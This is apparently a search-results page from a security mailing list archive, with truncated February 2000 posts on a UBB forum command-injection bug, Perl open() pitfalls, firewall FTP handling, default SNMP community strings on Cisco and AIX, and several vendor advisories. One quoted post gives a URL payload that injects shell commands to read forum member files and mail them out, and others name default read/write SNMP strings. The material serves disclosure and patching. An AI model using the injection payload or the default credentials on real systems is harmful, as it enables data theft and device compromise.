For the record, the latest versions of the UBB (Freeware version '2000', and
a new release of licensed version 5.43d) contain fixes for this bug as of
yesterday. The fix has also been posted in this thread:
http://www.scriptkeeper.com/ubb/Forum16/HTML/000814.html
--
Charles Capps
- Origina
On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
# It works on the full version also...
#
# Little different syntax:
# topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]|
# (note the ../ on the Members. You have to go up a directory to get the
# file. Maybe you could stop it via simple folde
On Mon, 14 Feb 2000, Bill wrote:
> "Sergei A. Golubchik" wrote:
> > The fix is obvious. But the rule of the thumb is "do not use magic perl
> > open". At least in cgi scripts. If you want to open regular file,
> > sysopen does the trick as well.
>
>Isn't open(FH, "< $variable") sufficient to
On Mon, Feb 14, 2000 at 07:32:54PM -0600, monti wrote:
[...snip...]
> I dont really think the issue is with 'how' the PASV response and packet
> appears on the wire, but with the Firewall's logic in creating a hole for
> PASV ftp data connections. I think the firewall should probably be a bit
> m
It should be noted in this discussion that MANY of these devices also
through SNMP querys can be completely compromised by either sending or
recieving configuration files from arbritrary locations. Both cisco and
ascend products support downloading and uploading of configuration files
via tftp fr
Nice summary.
> - Windows 98 (not 95) - public
You have to install the agent, it's not stock. And it's not so much that
the world-writable string is "public" as it is that there isn't one.
You'll get write access no matter what community name you use. MS made
improvments under NT, 'cause it wa
Following on from Michael Zalewski's recent SNMP post, here's an issue i
noted on two AIX systems.
NOTE: This was seen on both AIX 4.3 and 4.2.
It appears that on the above releases of AIX, the SNMP daemon is enabled
by default and two community names are enabled with read/write privileges.
The
2000-02-14-13:44:09 Julien Nadeau:
> A solution would be for kernels to provide an option to keep a
> local IP lookup table which could be simply based on network
> interfaces; of course, given an stable implementation, this option
> enabled by default would take care of spoofing problems for admi
On Sat, 12 Feb 2000, Dragos Ruiu wrote:
> How to use it:
> -This patch makes the kernel log all ethernet packets to syslog.
> -The logging happens at the default level. I.e. normally on.
> -You can turn logging on and off at the console by using the Magic SysRq key
> and a number to change the
On Mon 14 Feb 2000 at 14:01:48 -0500, Kragen Sitaker wrote:
> The successful exploit requires a remarkable chain of extreme forgiveness:
> 1- The web browser must accept an illegal URL from (possibly valid,
>although very unusual) HTML.
> 2- The web browser must send an illegal HTTP request wi
The following is also true for PHP. Naming PHP include files .inc gives
anyone full-read access to the files by simply requesting them by name.
The solution of course is to do one of the following:
a. name php include files with a PHP extension (.php, .php3, etc) that is
associated wit
-BEGIN PGP SIGNED MESSAGE-
NetBSD Security Advisory 2000-001
=
Topic: procfs security hole
Version:NetBSD 1.4.1 and prior; NetBSD-current until 2126
Severity: If the proc filesystem is mounted, a
Description: Doubledot bug in FrontPage FrontPage
Personal Web Server.Compromise: Accessing drive trough
browser.Vulnerable Systems: Frontpage-PWS32/3.0.2.926 other versions not
tested.Details:When FrontPage-PWS runs a site on your c:\ drive your
drive could be accessed by any user accessing
I wanted to reply to this, and make a clarification -
At 08:57 PM 2/14/00 -0500, Rishi Lee Khan wrote:
>There is an easy way to open a web page using and email client using HTML
>parsing ... simply put in the tag content="0;URL=http://www.yourpagehere.com">
Tried it, and it doesn't seem to work
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
Microsoft Security Bulletin (MS00-009)
-
Cisco 1924s for sure have "public" as rw string and "private" for ro,
and I'm about 80% sure the 2924 does too.
Many Cisco routers have an snmp "feature" with security ramifications
which Damir Rajnovic has agreed to post to Bugtraq (as of Jan. 1), but I
guess Cisco's lawyers have to hash it out
monti wrote:
> The attacker then issues something like a 'stat -1 filename',
> and plays
Interesting.. a bug in wuftpd which makes the life a lot more
interesting for the FW1 issue.
The bug is that wuftpd does not pad lines that may be misread as FTP
status codes in multiline responses with a s
Lincoln Stein writes:
> The important point is that anything coming from the outside -- the
> URL, the SERVER_PROTOCOL, the request body, the request MIME type --
> should be treated as untrusted data. If you turn on taint checking,
> Perl will refuse to take "dangerous actions" with untrusted da
I've written a tool for remotely telling ddos zombies to stop flooding.
Most detectors out there will not detect during a flood (due to the
traffic involved), so I thought trying to turn the flood off might be kind
of nice. Like the detectors, it assumes default settings on the ddos
daemons. Works
19 matches
Mail list logo
